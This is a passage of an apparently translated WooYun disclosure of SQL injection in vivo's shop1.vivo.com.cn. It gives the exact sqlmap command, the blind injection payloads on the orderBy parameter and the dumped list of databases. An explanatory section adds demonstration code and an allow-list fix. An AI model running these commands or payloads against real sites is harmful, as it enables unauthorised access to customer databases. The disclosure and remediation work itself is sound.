Vulnerability summary

Defect ID: wooyun-2015-0151543

Title: SQL injection on a vivo site can affect 1.8 million (180W) members

Related vendor: vivo智能手机 (vivo smartphones)

Author: 路人甲

Submitted: 2015-11-03 17:06

Fix time: 2015-11-08 17:08

Disclosed: 2015-11-08 17:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help please contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-11-03: details sent to the vendor, awaiting the vendor's response
2015-11-08: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

This is a test site, http://shop1.vivo.com.cn, but the database user has very broad privileges: it can span 12 databases, including zabbix, cacti, the shop databases and others.

PS C:\sqlmap-master> python sqlmap.py -u "http://shop1.vivo.com.cn/gallery-ajax_get_goods.html" --data="cat_id=22&orderBy=1&showtype=list&&virtual_cat_id=" -porderBy --risk 3 --random-agent --dbs --thread 5
sqlmap {1.0-dev-nongit-20151020} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:46:16
[13:46:16] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap-master\txt\user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0'
[13:46:16] [INFO] resuming back-end DBMS 'mysql'
[13:46:16] [INFO] testing connection to the target URL
[13:46:17] [INFO] heuristics detected web page charset 'ISO-8859-2'
[13:46:17] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: orderBy (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: cat_id=22&orderBy=(SELECT (CASE WHEN (8230=8230) THEN 8230 ELSE 8230*(SELECT 8230 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&showtype=list&&virtual_cat_id=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cat_id=22&orderBy=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NPOW)&showtype=list&&virtual_cat_id=
---
[13:46:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5.0
[13:46:19] [INFO] fetching database names
[13:46:19] [INFO] fetching number of databases
[13:46:19] [INFO] retrieved: 11
[13:46:21] [INFO] retrieving the length of query output
[13:46:21] [INFO] retrieved: 18
[13:46:59] [INFO] retrieved: information_schema
[13:46:59] [INFO] retrieving the length of query output
[13:46:59] [INFO] retrieved: 5
[13:47:09] [INFO] retrieved: cacti
[13:47:09] [INFO] retrieving the length of query output
[13:47:09] [INFO] retrieved: 7
[13:47:25] [INFO] retrieved: ecstore
[13:47:25] [INFO] retrieving the length of query output
[13:47:25] [INFO] retrieved: 5
[13:47:37] [INFO] retrieved: mysql
[13:47:37] [INFO] retrieving the length of query output
[13:47:37] [INFO] retrieved: 18
[13:48:19] [INFO] retrieved: performance_schema
[13:48:19] [INFO] retrieving the length of query output
[13:48:19] [INFO] retrieved: 7
[13:48:41] [INFO] retrieved: seckill
[13:48:41] [INFO] retrieving the length of query output
[13:48:41] [INFO] retrieved: 4
[13:48:51] [INFO] retrieved: test
[13:48:51] [INFO] retrieving the length of query output
[13:48:51] [INFO] retrieved: 14
[13:49:30] [INFO] retrieved: test_php568cms
[13:49:30] [INFO] retrieving the length of query output
[13:49:30] [INFO] retrieved: 8
[13:49:52] [INFO] retrieved: vivo_chk
[13:49:52] [INFO] retrieving the length of query output
[13:49:52] [INFO] retrieved: 10
[13:50:26] [INFO] retrieved: vivo_store
[13:50:26] [INFO] retrieving the length of query output
[13:50:26] [INFO] retrieved: 6
[13:50:40] [INFO] retrieved: zabbix
available databases [11]:
[*] cacti
[*] ecstore
[*] information_schema
[*] mysql
[*] performance_schema
[*] seckill
[*] test
[*] test_php568cms
[*] vivo_chk
[*] vivo_store
[*] zabbix
[13:50:40] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\shop1.vivo.com.cn'


Check the number of shop members:

[screenshot: 180w.png]
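The injected parameter here is orderBy, which the application splices into an ORDER BY clause; a sort column cannot be bound as a prepared-statement parameter, so the standard fix is an allow-list that maps the client's value onto a fixed set of column names. The following is an added illustration, not code from vivo's site or from this report: it uses a constructed in-memory SQLite table as a stand-in for the goods table and shows why a condition inside an injected sort expression flips the row order (the boolean-based blind technique sqlmap reported above) and how the allow-listed version refuses anything but a known sort key.

```python
import sqlite3

# Constructed stand-in for a goods table; not vivo's real schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE goods (id INTEGER, cat_id INTEGER, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO goods VALUES (?, ?, ?, ?)",
        [(1, 22, "phone A", 999.0), (2, 22, "phone B", 1299.0), (3, 7, "case", 29.0)],
    )
    conn.commit()
    return conn

def list_goods_vulnerable(conn, cat_id, order_by):
    # cat_id is bound safely, but orderBy is pasted into the statement text.
    # ORDER BY cannot take a bound parameter, so whatever SQL the client sends
    # becomes part of the query; a condition in it changes the row order,
    # which is exactly the one-bit oracle a boolean-based blind test observes.
    sql = "SELECT id FROM goods WHERE cat_id = ? ORDER BY " + order_by
    return [row[0] for row in conn.execute(sql, (cat_id,))]

# Allow-list: the client may only send one of these keys, never a column name
# or expression of its own. Values are hard-coded, so nothing client-supplied
# reaches the statement text.
SORT_COLUMNS = {"1": "id", "2": "price", "3": "name"}

def sort_key_allowed(order_by):
    return str(order_by) in SORT_COLUMNS

def list_goods_safe(conn, cat_id, order_by, direction="asc"):
    if not sort_key_allowed(order_by):
        raise ValueError("unknown sort key: %r" % (order_by,))
    column = SORT_COLUMNS[str(order_by)]
    # Direction is likewise normalised to one of two fixed tokens.
    direction = "DESC" if str(direction).lower() == "desc" else "ASC"
    sql = "SELECT id FROM goods WHERE cat_id = ? ORDER BY %s %s" % (column, direction)
    return [row[0] for row in conn.execute(sql, (cat_id,))]

if __name__ == "__main__":
    db = make_db()
    print(list_goods_vulnerable(db, 22, "(CASE WHEN 1=1 THEN price ELSE -price END) DESC"))
    print(list_goods_vulnerable(db, 22, "(CASE WHEN 1=2 THEN price ELSE -price END) DESC"))
    print(list_goods_safe(db, 22, "2", "desc"))
```

A second, independent control visible in the sqlmap output is the database account itself: a shop front-end should connect with an account that can see only its own schema, so that an injection in the shop cannot enumerate zabbix, cacti or the other databases listed above.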

Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-11-08 17:08

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet